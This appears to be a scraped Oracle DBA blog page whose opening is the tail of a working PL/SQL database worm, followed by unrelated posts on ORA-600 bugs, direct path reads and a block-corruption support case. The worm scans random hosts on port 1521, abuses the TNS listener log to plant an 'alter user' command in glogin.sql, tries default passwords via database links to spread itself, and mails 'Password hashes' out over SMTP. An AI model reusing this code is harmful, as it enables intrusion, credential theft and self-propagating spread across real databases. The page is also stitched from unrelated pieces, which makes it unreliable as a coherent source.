         mailhost  CONSTANT VARCHAR2(30) := 'smtp01.us.oracle.com';
         crlf      CONSTANT VARCHAR2(2):= CHR(13) || CHR(10);
         mesg      VARCHAR2(32000);
         mail_conn utl_smtp.connection;

      BEGIN
          begin

           loop

            mail_conn := utl_smtp.open_connection(mailhost, 25);

            mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: larry at oracle.com' || crlf || '' || crlf || v_message;

            utl_smtp.helo(mail_conn, mailhost);
            utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
            utl_smtp.rcpt(mail_conn, 'larry at oracle.com');
            utl_smtp.data(mail_conn, mesg);
            utl_smtp.quit(mail_conn);

            EXIT WHEN round(dbms_random.value(1, 20)) = 10;

           end loop;

         EXCEPTION
            WHEN OTHERS THEN
               DBMS_OUTPUT.PUT_LINE('');
         end;

         current_ipaddress := round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254)) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));

         mail_conn := utl_smtp.open_connection(current_ipaddress, 25);

         mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: oracle@' || current_ipaddress || crlf || '' || crlf || v_message;

         utl_smtp.helo(mail_conn, current_ipaddress);
         utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
         utl_smtp.rcpt(mail_conn, 'oracle@' || current_ipaddress);
         utl_smtp.data(mail_conn, mesg);
         utl_smtp.quit(mail_conn);

      EXCEPTION
         WHEN OTHERS THEN
            DBMS_OUTPUT.PUT_LINE('');

      end;

   end if;

   if iHostToSearchFor < 255 then

      current_ipaddress := current_network || '.' || iHostToSearchFor;

   else

      current_ipaddress := round( dbms_random.value(1, 254) ) || '.' || round(
dbms_random.value(1, 254) ) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));

   end if;

   iHostToSearchFor := iHostToSearchFor + 1;

   vResp := '';

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vReqLog);
   vLen := UTL_TCP.READ_RAW(c, vResp, 100 );

   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 13, 88));
   vResp := vRespPiece;

   declare
      read_from_network varchar2(32000);
      length_read_from_network INTEGER;
   begin
      loop
         read_from_network := '';
         length_read_from_network := UTL_TCP.READ_RAW(c, read_from_network, 100 );
         read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
         vResp := vResp || read_from_network;
      end loop;

   EXCEPTION
     when OTHERS then
         read_from_network := '';
   end;

   UTL_TCP.CLOSE_CONNECTION(c);

   declare
      i5 INTEGER;
      i6 INTEGER;
      oraclehome varchar2(1000);
   begin

   i5 := 1;
   i6 := 1;

   i5 := instr(vResp, '(LOGDIRNAME=', 1);

   if i5 > 0 then

      i6 := instr(vResp, '\network\log', i5);
      if i6 = 0 then
         i6 := instr(vResp, '/network/log', i5);
      end if;

      oraclehome := substr( vResp, i5 + 12, i6 - (i5 + 12) );

   end if;

   iLength := length(oraclehome);

   vRequestLogChange := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/sqlplus/admin/glogin.sql)))'));

   vRequestLogReset := UTL_RAW.CONCAT( utl_raw.substr( utl_raw.cast_from_binary_integer
(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) || chr(0) || chr(1) || chr(0) ||
chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/network/log/listener.log)))'));

   vWorking1 := 'alter user mdsys identified by mdsys;';

   iLength := length(vWorking1) + 1;

   vRequestSQLCommand := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(58 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(iLength), 3, 2 ), utl_raw.cast_to_raw
( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(10) || vWorking1));

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogChange);
   UTL_TCP.CLOSE_CONNECTION(c);

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestSQLCommand);
   UTL_TCP.CLOSE_CONNECTION(c);

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogReset);
   UTL_TCP.CLOSE_CONNECTION(c);

   end;

   c1  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);

   vResp := '';

   ret_val := UTL_TCP.WRITE_RAW(c1, utl_raw.cast_to_raw(vRequest));
   vLen := UTL_TCP.READ_RAW(c1, vResp, 100 );

   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 58));
   vResp := vRespPiece;

   declare
      read_from_network varchar2(32000);
      length_read_from_network INTEGER;
   begin
      loop
         read_from_network := '';
         length_read_from_network := UTL_TCP.READ_RAW(c1, read_from_network, 100 );
         read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
         vResp := vResp || read_from_network;
      end loop;

   EXCEPTION
      when OTHERS then
         read_from_network := '';
   end;

   UTL_TCP.CLOSE_CONNECTION(c1);

   declare
      i3 INTEGER;
      i4 INTEGER;
      sid varchar2(100);
      i binary_integer;
      procedure_to_spread varchar2(32000);
      create_link varchar2(500);
   begin

   i3 := 1;
   i4 := 1;

   loop

     i3 := instr(vResp, '(INSTANCE_NAME=', i3);
     exit when i3 = 0;

     i4 := instr(vResp, ')', i3);
     sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
     i3 := i3 + 1;

     begin
        if sid = PreviousSID or sid = 'PLSExtProc' or sid = 'extproc'
        then
           dbms_output.put_line( sid );
        else
           dbms_output.put_line( sid );

           iLoop := 0;

           loop

           declare

              username1 varchar2(100);
              password1 varchar2(100);

           begin

              iLoop := iLoop + 1;
              exit when iLoop = 8;

              if iLoop = 5 then
                 username1 := 'system';
                 password1 := 'manager';

              ELSIF iLoop = 6 then
                 username1 := 'sys';
                 password1 := 'change_on_install';

              ELSIF iLoop = 1 then
                 username1 := 'dbsnmp';
                 password1 := 'dbsnmp';

              ELSIF iLoop = 2 then
                 username1 := 'outln';
                 password1 := 'outln';

              ELSIF iLoop = 4 then
                 username1 := 'scott';
                 password1 := 'tiger';

              ELSIF iLoop = 3 then
                 username1 := 'mdsys';
                 password1 := 'mdsys';

              ELSIF iLoop = 7 then
                 username1 := 'ordcommon';
                 password1 := 'ordcommon';

              end if;

              BEGIN
                 EXECUTE IMMEDIATE 'drop database link xxx';
              EXCEPTION
                 when OTHERS then
                    DBMS_OUTPUT.PUT_LINE( '' );
              end;

              create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || username1 || '
IDENTIFIED BY ' || password1 || ' USING ''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =
(PROTOCOL = TCP)(HOST = ' || current_ipaddress || ')(PORT = 1521)))(CONNECT_DATA=
(SERVER=DEDICATED)(SERVICE_NAME=' || SID || ')))''';

              EXECUTE IMMEDIATE create_link;
              EXECUTE IMMEDIATE vWorking;

           EXCEPTION
              when OTHERS then
                 DBMS_OUTPUT.PUT_LINE( '' );
           end;

           end loop;

        end if;

        PreviousSID := SID;

     end;

   end loop;

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequestStop));
   UTL_TCP.CLOSE_CONNECTION(c);

   end;

EXCEPTION
     when OTHERS then
      DBMS_OUTPUT.PUT_LINE('');
end;

end loop;

END;
--##endc0GtJBi1

ora-600[qesmmCValStat4]一例

在之前的文章中提到过一个有趣的绘制五角星的SQL,具体SQL语句如下:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

在10.2.0.1版本输入以上SQL可能会出现ORA-00600: internal error code, arguments: [qesmmCValStat4], [3], [1], [], [],[], [], []错误,g10r21_ora_15473.trc

其调用栈为:qercoFetch->qerhjFetch->qerhjInitializeManagementComponents->

qesmmCStartWorkArea->qesmmCValidateStatus->kgeasnmierr(报错)

metalink文档ID 360811.1对该 Bug 4926357进行了描述,该bug可能在9.2.07~10.2.0.1版本中出现,一般由带start with … … connect by prior ..子句的查询语句引起;典型的调用栈为:qesmmCValidateStatus<- qesmmCStartWorkArea <-qerhjInitializeManagementComponents <-qerhjFetch …

未公布的Bug 4401437是Bug 4926357的一个复制品avatar,该Bug已在10.1.0.5, 10.2.0.2, 11.1等版本中修复了。

Oracle support建议的四种解决方式:

1. 打上该Bug的one-off补丁;

2.升级到该Bug已修复的大版本中,例如从10.2.0.1升级到10.2.0.2;

3.设置参数hash_join_enabled(9i中),_hash_join_enabled(10g中),实例级别的或者会话级别的均可,如:

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
PL/SQL Release 10.2.0.1.0 - Production
CORE    10.2.0.1.0      Production
TNS for Linux: Version 10.2.0.1.0 - Production
NLSRTL Version 10.2.0.1.0 - Production

SQL> alter session set "_hash_join_enabled"=false;

Session altered.

SQL> set pagesize 1400;
SQL> with a as
2   (select distinct round(sum(x) over(order by n)) x,
3                    round(sum(y) over(order by n)) y
4      from (select n,
5                   cos(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) * 2 x,
6                   sin(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) y
7              from (select rownum - 1 n from all_objects where rownum <= 20 * 5)))
8  select replace (sys_connect_by_path(point, '/'), '/', null) star
9    from (select b.y, b.x, decode(a.x, null, ' ', '*') point
10            from a,
11                 (select *
12                    from (select rownum - 1 + (select min(x) from a) x
13                            from all_objects
14                           where rownum <= (select max(x) - min(x) + 1 from a)),
15                         (select rownum - 1 + (select min(y) from a) y
16                            from all_objects
17                           where rownum <= (select max(y) - min(y) + 1 from a))) b
18           where a.x(+) = b.x
19             and a.y(+) = b.y)
20   where x = (select max(x) from a)
21   start with x = (select min(x) from a)
22  connect by y = prior y and x = prior x + 1;

STAR
--------------------------------------------------------------------------------
.................
20 rows selected.

4.设置’no_filtering’ 提示,如:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select  /*+ no_filtering */ replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

但是该hint在9.2.0.7版本中可能因为Bug 4752555 ‘Wrong results from CONNECT BY query’而导致返回错误行数;并且这是一个undocumented hint,所以强烈不推荐使用!

ORA-600 internal error[kqrfrpo]一例

3月17日某客户主机上出现了文件系统空间不足的问题,经查发现是Oracle在1点左右产生了大量trace跟踪文件以致耗尽了磁盘空间,这些trace跟踪文件均是由Oracle服务进程遭遇错误“ORA-600: : internal error code, arguments: [kqrfrpo], [0x700000279FF98E0], [11], [], [], [], [], []”后在用户udump目录下所产生。

据客户工作人员称,在当时情况下(1点20分左右)以系统DBA权限本地方式登录数据库缓慢,而在1点25分时,登录缓慢现象消失,当时检查数据库,发现没有异常等待(如latch free等)和资源锁,数据库恢复正常。

Ora-600错误代码代表发生的错误是Oracle内部错误,一般是由于Oracle bug,操作系统bug或不当设置等问题引起的;具体发生的问题细节需要通过错误附加项来了解,本次错误中出现的第一位错误附加项是kqrfrpo。

通过METALINK相关文档我们发现ORA-600 kqrfrpo错误极有可能是Oracle 9i中的bug 3835429 OERI[kqrfrpo] / DB hang after killing a user process 所引起的,该bug跨越版本9.2.0.1.0至9.2.0.6.0,在版本9.2.0.7.0中得到了修正。

该bug的产生原因简述为,当一个用户进程在某个不恰当的时机被杀死,那么字典缓存latch可能无限期地被挂起,当其他进程无法获得该闩,则可能引起数据库级别的挂起(database wide hang)。

进一步分析ORA-600 kqrfrpo错误可能造成的影响,METALINK文档中就该错误可能造成影响的分类如下:
* 实例意外终止,即Oracle数据库crash(如pmon进程发生ora-600错误)
* 进程意外终止,在数据库层面表现为会话级的失败
* 内存块损坏
* 可能导致磁盘上的数据损坏
* 无任何影响

幸运的是,本次的ORA-600[kqrfrp]错误没有发生在数据库后台进程(pmon等)中,因此没有发生实例意外终止的现象,但出现登录数据库缓慢的现象,并且伴随用户进程因ora-600错误而异常中止。仔细观察600错误的trace文档可以发现,其中部分数据库服务进程的应用客户端为JDBC THIN CLIENT即java瘦客户端应用,若该类应用服务在活动情况下遭遇上述错误可能导致SQL执行出现问题,进而使得应用逻辑在数据库层面未得到实现。实际的情况仍需要得到应用方面的确认。

回顾该系统之前的情况,于3月16日夜间因通过cics连接的数据库服务进程遭遇ORA-600[4454]错误,在当时情况下无法在数据库级别杀死session,故在操作系统级别杀死了上述遭遇ORA-600[445]错误的服务进程;联系到以上情况,有可能是杀死进程触发了BUG,使得ORA-600[kqrfrpo]错误出现。从杀死用户进程到ora-600错误出现,期间跨越了4个小时。

针对ORA-600 kqrfrpo错误,因考虑到该错误是通过杀死用户服务进程的操作触发,故可以将之视为在特殊操作情况下才可能发生的隐性错误,实际数据库运行周期内需要杀死服务进程的情况并不常见,故该错误发生的概率较低。建议:
* 优先使用alter system kill session的命令来清除相关会话和进程
* 应用针对该bug的补丁3835429以彻底解决该问题。

直接路径读取对于延迟块清除的影响

在Oracle 11g版本中串行的全表扫描可能使用直接路径读取(direct path read)的方式取代之前版本中一直使用的DB FILE SCATTERED READ, 显然direct path read具备更多的优势:

1. 减少了对栓的使用,避免可能的栓争用

2.物理IO的大小不再取决于buffer_cache中所存在的块;试想某个8个块的extent中1,3,5,7号块在高速缓存中,而2,4,6,8块没有被缓存,传统的方式在读取该extent时将会是对2,4,6,8块进行4次db file sequential read,这是一种十分可怕的状况,其效率往往要比单次读取这个区间的所有8个块还要低得多,虽然Oracle为了避免这种情况总是尽可能的不缓存大表的块(读入后总是放在队列最冷的一端);而direct path read则可以完全避免这类问题,尽可能地单次读入更多的物理块。

当然直接路径读取也会引入一些缺点:

1.在直接路径读取某段前需要对该对象进行一次段级的检查点(A segment checkpoint).

2.可能导致重复的延迟块清除操作(我们假设你了解delayed block cleanout是什么).

metalink 文档[ID 793845.1] 对该新版本中的变化进行了描述:

Applies to:

Oracle Server – Enterprise Edition – Version: 11.1.0.6 to 11.1.0.7
This problem can occur on any platform.

Symptoms

After migrating an 11g database from a standalone to a 4-node RAC,  a noticeable
increase of 'direct path read' waits were observed at times.
Here are the Cache sizes and Top 5 events.
waits

Cache Sizes                       Begin        End
~~~~~~~~~~~                  ---------- ----------
               Buffer Cache:     3,232M     3,616M  Std Block Size:         8K
           Shared Pool Size:     6,736M     6,400M      Log Buffer:     8,824K
Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
DB CPU                                           13,916          42.1
direct path read                  1,637,344      13,359      8   40.4 User I/O
db file sequential read              47,132       1,111     24    3.4 User I/O
DFS lock handle                     301,278       1,028      3    3.1 Other
db file parallel read                14,724         554     38    1.7 User I/O

Changes

Migrated from a standalone database to a 4-node RAC.
Moved from Unix file system storage to ASM.

Using Automatic Shared Memory Management (ASMM).
The setting of db_cache_size in spfile/pfile is low compared to normal workload requirements.

Cause

There have been changes in 11g in the heuristics to choose between direct path reads or reads through buffer cache for serial table scans.
In 10g, serial table scans for “large” tables used to go through cache (by default) which is not the case anymore.  In 11g, this decision to read via direct path or through cache is based on the size of the table, buffer cache size and various other stats.
Direct path reads are faster than scattered reads and have less impact on other processes because they avoid latches.

Solution

When using Automatic Shared Memory Management (ASMM) and with buffer cache low limit set at a low end compared to the normal workload requirements and usually after startup, 11g might choose to do serial direct path read scans for large tables that do not fit in the SGA. When ASMM increases the buffer cache due to increased demand, 11g might not again do serial direct path read scans for these same large tables.  If you like to avoid this from happening, you should note the buffer cache and share pool requirements for a normal workload and set the low limits of buffer cache and shared pool in spfile/pfile close to these normal workload values.
db_cache_size
shared_pool_size

下面我们对直接路径读取对于延迟块清除造成的影响进行测试:

SQL> create table tv as select rownum rn,rpad('A',600,'Z') rp from dual
2       connect by level <=300000;

表已创建。

新建一个会话a:

SQL> set linesize 200 pagesize 1400;
SQL> select count(*) from tv;

COUNT(*)
----------
300000

SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct');

SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                          27281
25 physical reads                                                 27273
25 physical reads direct                                          27273         
25 cleanouts only - consistent read gets                            0

-- 显然查询采用了直接路径读取方式

SQL> update tv set rn=rn+1;                        -- 尝试批量更新

SQL> alter system flush buffer_cache;             
-- 刷新高速缓存,造成延迟块清除的情景,并提交

系统已更改。

SQL> commit;

提交完成。

新建一个会话b:

SQL> set linesize 200 pagesize 1400;
SQL> select count(*) from tv;

COUNT(*)
----------
300000

SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');

SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                 54554
25 physical reads                                                        27273
25 physical reads direct                                                 27273
25 redo size                                                                 0
25 cleanouts only - consistent read gets                           27273      
--查询采用direct path read时产生了延迟块清除操作,但不产生redo

SQL> select count(*) from tv;

COUNT(*)
----------
300000

SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');

SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                109104
25 physical reads                                                        54546
25 physical reads direct                                                 54546
25 redo size                                                                 0
25 cleanouts only - consistent read gets                                 54546

再次查询仍采用直接路径读取,产生了相同数目的延迟块清除操作,并没有产生redo;可见direct path read的清除操作仅是针对从磁盘上读取到PGA内存中的镜像,而不对实际的块做任何修改,因而也没有任何redo;

下面我们使用普通串行全表扫描方式,设置event 10949可以避免采用直接路径读取方式.关于该事件可以参见这里.

SQL> ALTER SESSION SET EVENTS '10949 TRACE NAME CONTEXT FOREVER';

会话已更改。

SQL> select count(*) from tv;

COUNT(*)
----------
300000

SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');

SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                163662
25 physical reads                                                        81819
25 physical reads direct                                                 54546
25 redo size                                                           1966560
25 cleanouts only - consistent read gets                                 81819

SQL> select count(*) from tv;

COUNT(*)
----------
300000

SQL> select vm.sid, vs.name, vm.value
2    from v$mystat vm, v$sysstat vs
3   where vm.statistic# = vs.statistic#
4     and vs.name in ('cleanouts only - consistent read gets',
5                     'session logical reads',
6                     'physical reads',
7                     'physical reads direct','redo size');

SID NAME                                                                  VALUE
---------- ---------------------------------------------------------------- ----------
25 session logical reads                                                190947
25 physical reads                                                        95673
25 physical reads direct                                                 54546
25 redo size                                                           1966560
25 cleanouts only - consistent read gets                                 81819

第一次采用普通全表扫描方式时产生了与direct path read时相同量的延迟块清除操作,并因此产生了大量的redo,这种模式回归到了最经典的延迟块清除情景中;之后的一次读取则不再需要清除块和产生重做了,我们在读取一个“干净”的表段。

从以上测试我们可以了解到,11g中使用更为广泛的direct path read方式对有需要延迟块清除操作的段所可能产生的影响,因为实际没有一个“修改块”的操作,所以虽然延迟块清除操作在该种模式下每次都必须产生,却实际没有产生脏块,因而也就不会有“写块”的必要,故而也没有redo的产生。所产生的负载可能更多的体现在cpu time的使用上。

ORA-00600 [KCBZPB_1], [59033077], [4], [1], [] example

below is the 600 entry in the alertlog:

alert.log:
Hex dump of Absolute File 14, Block 312821 in trace file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc
***
Corrupt block relative dba: 0x0384c5f5 (file 14, block 312821)
Bad header found during preparing block for write
Data in bad block -
type: 6 format: 1 rdba: 0x00000384
last change scn: 0xf90b.c5f55f7c seq: 0x9 flg: 0x72
consistency value in tail: 0x0001f90b
check value in block header: 0x102, block checksum disabled
spare1: 0x6, spare2: 0x2, spare3: 0x0
***
Thu Apr 16 18:32:48 2009
Errors in file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc:
ORA-00600: internal error code, arguments: [kcbzpb_1], [59033077], [4], [1], [], [], [], []
Thu Apr 16 18:32:49 2009
Errors in file /u01/ORAHOME/app/oracle/admin/TIGERS7/bdump/tigers7_dbw0_10999.trc:
ORA-00600: internal error code, arguments: [kcbzpb_1], [59033077], [4], [1], [], [], [], []
DBW0: terminating instance due to error 600
Instance terminated by DBW0, pid = 10999
Thu Apr 16 19:04:58 2009

After that, We have executed dbverify against the identified file and it produced no errors:

DBVERIFY: Release 9.2.0.8.0 - Production on Thu Apr 16 19:31:32 2009

Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.


DBVERIFY - Verification starting : FILE = /u32/ORAINDX/oradata/TIGERS7/indx01.dbf

DBVERIFY - Verification complete

Total Pages Examined : 1280000
Total Pages Processed (Data) : 0
Total Pages Failing (Data) : 0
Total Pages Processed (Index): 1262823
Total Pages Failing (Index): 0
Total Pages Processed (Other): 8751
Total Pages Processed (Seg) : 0
Total Pages Failing (Seg) : 0
Total Pages Empty : 8426
Total Pages Marked Corrupt : 0
Total Pages Influx : 0
Highest block SCN : 10386833124905 (2418.1602203177)

we do open a sr ,and oracle support suggest to do below query:
ACTION PLAN
===========
1) please describe the sequence of events leading up to the problem

2) please upload the alert.log. ZIP if >2MB. Dot not use RAR.

3) please describe your backup strategy:
a) when was your last valid backup?
b) are you using RMAN to perform this backup?
c) do you have all archivelogs from the last backup to now?
d) was this a hot or cold backup?

4) even if you’re not using RMAN, run the following in RMAN:
$ rman target /
RMAN> backup validate check logical database;

5) Once RMAN validate is completed, run the following in SQL*Plus as SYSDBA:
SQL> select * from v$database_block_corruption;

6) Please run the following query in SQL*Plus as SYSDBA
— db must be in either MOUNT or OPEN mode
— Save the queries to a file, eg. rec_query1.sql, then run it in SQL*Plus
—————– start ——————
set echo on
set pagesize 2000 linesize 200 trimspool on
col name form a60
col status form a10
col dbname form a15
col member form a60
col inst_id form 999
col resetlogs_time form a25
col created form a25
col DB_UNIQUE_NAME form a15
col stat form 9999999999
col thr form 99999
col “Uptime” form a80

spool rec_query1.out
show user
alter session set nls_date_format=’DD-MM-RR hh24:mi:ss’;

select inst_id, instance_name, status,
to_char(STARTUP_TIME,’dd-Mon-yyyy hh24:mi’) || ‘ – ‘ ||
trunc(SYSDATE-(STARTUP_TIME) ) || ‘ day(s), ‘ ||
trunc(24*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME)))||’ hour(s), ‘ ||
mod(trunc(1440*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME))), 60) ||’ minute(s), ‘ ||
mod(trunc(86400*((SYSDATE-STARTUP_TIME) – trunc(SYSDATE-STARTUP_TIME))), 60) ||’ seconds’
“Uptime”
from gv$instance
order by inst_id
/

select dbid, name dbname, open_mode, database_role,
to_char(created,’dd-Mon-YYYY hh24:mi:ss’) created,
to_char(resetlogs_time,’dd-Mon-YYYY hh24:mi:ss’) resetlogs_time
from v$database;

archive log list;

select count(*) from v$backup where status = ‘ACTIVE’;

select * from v$log;
select * from v$logfile;
select * from v$recover_file order by 1;

select distinct(status)from v$datafile;
select FILE#,TS# , status, NAME from v$datafile
where status not in (‘SYSTEM’,’ONLINE’)
order by 1;

select fhsta, count(*)
from X$KCVFH group by fhsta;

select min(fhrba_Seq), max(fhrba_Seq)
from X$KCVFH;
select hxfil FILE#,fhsta STAT,fhscn SCN,
fhthr thr, fhrba_Seq SEQUENCE,fhtnm TABLESPACE
from x$kcvfh order by 1;

7) dump the block. Run the following as SYSDBA in SQL*Plus:
SQL> alter session set max_dump_file_size=unlimited;
SQL> oradebug setmypid;
SQL> alter system dump datafile ‘full pathname for file 14’ block 312821;
SQL> oradebug tracefile_name;

==> upload the said trace file

8) run dbv against datafile 14:
$ dbv file= logfile=

spool off
—————– end ——————

RESEARCH
===============
ORA-600 [4519] “Block Corruption Detected – Cache type wrong”
We found a corrupted block when trying to read a block using
consistent read. An invalid block type was found.
Possible Block Corruption in Memory.

ORA-600 [kcbzpb_1] A block has been read cleanly from disk and updated successfully by the
clients of the cache layer.
Before the cache layer writes the block back to disk it does a health
check on the cache header.
If requested to do so (default), it generates a checksum for the block.
The health check is failing.
MEMORY CORRUPTION

ORA-600 [kcbzpb_1] was raised because DBA 59033077 => 14,312821 was found corrupted when read in the cache before we writ eit to disk.
Alert.log shows same block as corrupted, BAD HEADER, meaning blocks was overwriten.
Now DBV doesn’t show any corruption in file 14.

ACTION PLAN
====================

Hi,

I reviewed the information and the crash was caused by in memory corruption.
If restarted your database should be fine.

RESEARCH
================
